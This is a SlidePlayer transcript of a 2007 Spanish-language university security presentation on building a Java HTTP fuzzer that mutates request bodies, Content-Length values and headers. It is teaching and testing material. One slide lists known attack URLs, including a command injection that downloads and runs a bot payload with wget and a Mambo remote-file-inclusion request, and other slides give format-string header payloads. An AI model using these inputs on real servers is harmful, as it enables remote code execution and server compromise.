Seguridad de la información 2do cuatrimestre 2007 Matías Chiodi, Hugo Meléndez, Diego Hara.

Slides:



Advertisements
Presentaciones similares
Presentación – Web Attack
Advertisements

1 | Web Attacks Documentación – Web Attack. 2 | Web Attacks Seguridad en Aplicaciones Web Protocolo HTTP Vulnerabilidad XSS Vulnerabilidad CSRF Path Traversal.
Introducción a COBHTTPD
FUNDAMENTALS OF THE JAVA PROGRAMMING LANGUAGE
Modelo HTTP Request/Response
Introducción a Django Manuel Kaufmann Septiembre de 2009
1 | Web Attacks Documentación – Web Attack. 2 | Web Attacks Seguridad en Aplicaciones Web Protocolo HTTP Vulnerabilidad XSS Vulnerabilidad CSRF Path Traversal.
E-science grid facility for Europe and Latin America CeCalCULA Ambientes y Herramientas para la e-Investigación Mérida, Portales.
CREACIÓN DE PÁGINAS WEB CON SHAREPOINT DESIGNER 2007 (Sesión 1) Ricardo Ferrís Castell ( ) Departament D Informàtica.
Windows Presentation Foundation
Desarrollo de Aplicaciones Internet Clase II Universidad de los Lagos 2011.
CONSTRUYENDO UNA PÁGINA WEB CON HTML. Introducción Construir una página web de sólo contenido es relativamente fácil La forma de abordarlo es sistémica.
DESARROLLO DE SOLUCIONES EMPRESARIALES MOVILES USANDO TECNOLOGIA SUN APLICACIONES MOVILES CON J2ME CONECTIVIDAD Ing. Ronald Criollo.
Single Table Inheritance
Capítulo 1 web.
Programación Interactiva Aplicaciones Cliente-Servidor
CI-2413 CGI & Compañía.
CI-2413 Desarrollo de aplicaciones para Internet
CI-2413 Desarrollo de Aplicaciones para Internet
AJAX CI-2413 Desarrollo de Aplicaciones para Internet.
Bases de Datos Espaciales SPATIAL QUERY LANGUAGES
Alberto Pedroso García - Junio/2004 Victor Ricardo Díaz – Junio/2007 Web Services.
Lenguajes de Programación Soluciones a pruebas de nivel
Tutorización individual a través de internet de una unidad de álgebra lineal. Nivel preuniversitario Lourdes Figueiras Ocaña Asesor: Josep Maria Fortuny.
Servicios De Internet.. Integrantes: Gemma Cedillo Saucedo Delia Alejandra Castillo Almazán Jorge Alberto Arregoytia Garcia Adriana Lara Mata Aleida Villegas.
Por Social Media Plan 1. MyBrand&SocialMedia ¿Qué hacemos? Estrategias a medida para nuestros clientes planificando y gestionando desde cero su plan de.
ClickMagic ClicMagic es la primera Affiliate Network en Chile y la única que ha desarrollado el exitoso modelo de Marketing de Afiliados en el mercado.
Entrada y salida Fundamentos de programación/Programación I
Visual basic Curso de Habilitación Laboral IV. ¿Qué es Visual Basic Visual Basic es uno de los tantos lenguajes de programación que podemos encontrar.
Avances de Microsoft PowerPoint y Office
A.E.D. Tema 0-2. Algorítmica Programa de teoría Parte I. Estructuras de Datos. 1. Abstracciones y especificaciones. 2. Conjuntos y diccionarios. 3. Representación.
Karol Fierro Marzo Es la herramienta web 2.0 más evolucionada, facilita la creación colaborativa de páginas en Internet, mediante sencillo lenguaje.
TEORÍAS DE LA ENSEÑANZA- APRENDIZAJE EN LÍNEA OBJETIVOS Poner en común las teorías personales sobre la enseñanza-aprendizaje A partir de lo anterior,
El impacto de la construcción y del uso de las viviendas es severo La construcción consume el 60% de las materias primas extraídas de la litosfera. Produce.
El BLOCK DE APUNTES – ADIESTRAMIENTO FUERA DEL AULA los acompañará diariamente | tendrá un formato definido por la cátedra, acordado con los alumnos |
Medición de la Satisfacción del Cliente 2010 Marzo de 2011.
CGI I La mayor parte de los elementos HTML de que disponemos permite al visitante visualizar los contenidos de un sitio, pero no interactuar con él. Dicho.
XHTML DINAMICO AVANZADO (AJAX Y DOM)
Indications in yellow = Live content Indications in white = Edit in master Indications in blue = Locked elements Indications in black = Optional elements.
SQL Base de Datos LENGUAJES DE CONSULTA AR y CR no pueden ser tomados como base para implementar porque: Poseen sintaxis compleja No permiten.
PL/SQL Francisco Moreno Universidad Nacional. Funciones Si un procedimiento tiene solo un parámetro de salida, se puede remplazar por una función y esta.
INTERNET Todos lo usamos pero… alguien sabe como funciona? ¬¬
Repositorios 2.0 & Objetos Digitales Celso Gonzáles.
CGI Common Gateway Interface (interfaz de pasarela común)
Compilación y depuración Modos de ejecución GWT Google Web Toolkit Prof. Ing. Esteban Ramírez.
Introduccion a las páginas WEB HTML
SOA conference. Qué es WCF Fundamentos de la Arquitectura WCF Adaptadores BizTalk WCF Novedades en BizTalk Demo.
Herramientas de Oracle para realizar Tuning de Sentencias SQL
Circuitos Digitales II
KNOWLEDGE MANAGEMENT Modelos y Estrategias de Implementación en la Gestión del Conocimiento Ph.D. Augusto Bernuy Alva
de Hacking a un eCommerce
Presentación Web Services Interoperability and SOAP Keith Ballinger Microsoft Corporation Alvaro Castromán Alfonso Odriozola.
Protocolos de la Capa de Aplicación
Sistemas Distribuidos basados en la web
Aplicaciones Web M.C. Jorge Eduardo Ibarra Esquer
PROTOCOLO HTTP ALGUNAS DEF.-
Servidor web Alumna: María Verónica Mancheno Materia: Gestión de Información Web Profesor: José Medina Moreira.
Internet y Navegadores Unidad 5.  WWW World wide web Literalmente "tela de araña mundial", más conocida como web.  HTML Lenguaje de Marcado de HyperTexto.
Las Tecnologías detrás del Internet Presenta Ing. Edwin Sandoval.
Tema 4 – Servicio Web Punto 3 – Protocolo HTTP Juan Luis Cano.
Introducción Principios de Programación Web Aplicaciones Web con JSP y Servlets de Java.
1. Introducción a Internet y a la Web ¿Qué es Internet? ● Red pública de redes interconectadas que usan el “Protocolo Internet” (IP) ●
Monkey HTTP Daemon :: A fast and scalable web server for Linux Eduardo Silva
Capítulo 2: Tecnologías para la creación de sitios web
Buscar y Gestionar Información con Nuevas Tecnologías
¿Qué es internet? Una gran red de alcance mundial Web Correo electrónico P2P IRC VoIP SSH Juegos en línea Imagen.
Dispositivos e Internet
La internet Unifica el lenguaje básico de los computadores para intercambiar datos Este lenguaje o protocolo se llama TCP/IP Consiste en un esquema de.
Ataques XSS y CSRF CI-2413 Desarrollo de Aplicaciones para Internet.
INTERNET Todos lo usamos… Alguien sabe como funciona?
Transcripción de la presentación:

Seguridad de la información 2do cuatrimestre 2007 Matías Chiodi, Hugo Meléndez, Diego Hara

Temario Fuzzing Objetivo del trabajo Documentación Implementación HTTP Requests Body+Content-Length Headers Ejemplos Casos conocidos en la URL Estrategias Framework ¿Cómo seguimos?

Fuzzing Recordemos sobre la clase de fuzzers… Técnica de testing Entradas aleatorias para programas Diseño del test sencillo Fácilmente reproducible (semiautomático/automático) Objetivo: Encontrar vulnerabilidades Buffer overflow Format String Race Conditions DoS por consumo de recursos Etc.

Objetivo del trabajo Investigación sobre fuzzers. HTTP Fuzzers existentes JBroFuzz ( Basic cross site scripting (XSS) checks Basic SQL injection (SQL) checks Buffer overflows (BFO) checks Format string errors (FSE) checks Integer overflows (INT) checks Implementar un HTTP fuzzer o Generar request malformados o Atacar distintas partes del request o Utilizar técnicas variadas en headers

Documentación RFC Hypertext Transfer Protocol -- HTTP/1.1 Material online.

Implementación Se creo un proyecto en Google Code para aprovechar las ventajas que provee (SVN, mantenimiento, etc.) Lenguaje utilizado: Java Librerías de conexión. Librerías para interactuar con el protocolo (http). Estructuras de alto nivel. Conocimiento del lenguaje por los integrantes del grupo. Eclipse

Implementación Se decidió atacar el request HTTP en diferentes formas Body (contenido con datos al azar). Content-length (tamaño invalido con respecto al body). Headers. Casos conocidos en la URL. Se utilizaron 2 estrategias distintas Buffer Overflow. Format String. Mucho Random!!!

HTTP Requests GET /dumprequest.html HTTP/1.1 Host: djce.org.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: ) Gecko/ Firefox/ Accept: text/xml, application/xml, application/xhtml+xml, text/html;q=0.9, text/plain;q=0.8, */*;q=0.5 Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Connection: keep-alive Keep-Alive: 300 POST / HTTP/1.1 Host: djce.org.uk Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: ) Gecko/ Firefox/ Accept-Encoding: gzip Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 Content-type: application/x-www-form-urlencoded Content-length: 32 home=Cosby&favorite+flavor=flies

Body + Content-Length Body Contenido aleatorio. Content-Length El mismo Mayor Menor Negativo Integer.MAXVALUE x 2 Alfanuméricos

Headers Accept AcceptCharset AcceptEncoding AcceptLanguage ContentMD5 Date Expect From Host IfMatch IfModifiedSince IfNoneMatch IfRange IfUnmodifiedSince Range Referer TE Upgrade UserAgent Warning

Headers Accept AcceptCharset AcceptEncoding AcceptLanguage ContentMD5 Date Expect From Host IfMatch IfModifiedSince IfNoneMatch IfRange IfUnmodifiedSince Range Referer TE Upgrade UserAgent Warning Tamaño Fijo

Headers Accept AcceptCharset AcceptEncoding AcceptLanguage ContentMD5 Date Expect From Host IfMatch IfModifiedSince IfNoneMatch IfRange IfUnmodifiedSince Range Referer TE Upgrade UserAgent Warning Tamaño Fijo Fechas

Headers Accept AcceptCharset AcceptEncoding AcceptLanguage ContentMD5 Date Expect From Host IfMatch IfModifiedSince IfNoneMatch IfRange IfUnmodifiedSince Range Referer TE Upgrade UserAgent Warning Tamaño Fijo Fechas Lista

Headers Accept AcceptCharset AcceptEncoding AcceptLanguage ContentMD5 Date Expect From Host IfMatch IfModifiedSince IfNoneMatch IfRange IfUnmodifiedSince Range Referer TE Upgrade UserAgent Warning Tamaño Fijo Fechas Lista Contenido Mixto

Headers Accept AcceptCharset AcceptEncoding AcceptLanguage ContentMD5 Date Expect From Host IfMatch IfModifiedSince IfNoneMatch IfRange IfUnmodifiedSince Range Referer TE Upgrade UserAgent Warning Tamaño Fijo Fechas Lista Contenido Mixto Formato Fijo

Headers Accept (lista – contenido mixto) text/xml, application/xml, text/html;q=0.9, text/plain;q=0.8, */* Date (fecha – formato fijo) Sat, 29 Oct :43:31 GMT Host (formato fijo – contenido mixto) From (formato fijo)

Ejemplos Accept (lista – contenido mixto) Accept: F92V92F=#5$#5GG552F9DGH23!DGH#6755J3202F0934F2FDFGDFBZFG$5GDF ……… Accept: F92V92, F=#5$#5GG5, 52F9DGH23!, DGH#6755J3202, F2FDFGDFBZFG$5GDF, ……… Accept: %x%x%x%x%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n Accept: F92V92;q=-3, F=#5$#5GG5;q=4.2, 52F9DGH23!;q=99999, ……… Date (fecha – formato fijo) Date: Sat, 29 Oct :43:31 GMT Date: Sat, 29 Feb :43:31 GMT Date: %x%x%x%x%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n Date: text/html, uuups Host (formato fijo – contenido mixto) Host: Host: From (formato fijo) From: Xlkc3e93lskslosdfjsdflsdlksdfklsfd ……… From: Xlkc%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x3e93lskslosdfjsdflsdlksdfklsfd ……… From:

Casos conocidos en la URL Barbut cmd.gif?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f barbut;wget barbut.c -o barbut;./b /mambo//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS= &mosConfig_absolute_path=

Estrategias Buffer Overflow Min, Max por header. Por tipo de dato. Format String Min, Max por header. Inserción de %x, %n,%s

Framework Jerarquía de Headers. Delegación en estrategias. Generación aleatoria de casos. Logueo de resultados. Reproducción de casos ejecutados.

¿Cómo seguimos? Atacar otros métodos. Armar una repositorio de ataques conocidos. Atacar un header en particular. Definir las estrategias por header.

Preguntas

FIN Muchas Gracias

Feedback: Política de privacidad Feedback
Do Not Sell My Personal Information
Sobre el proyecto: SlidePlayer Condiciones de uso

© 2025 SlidePlayer.es Inc. All rights reserved.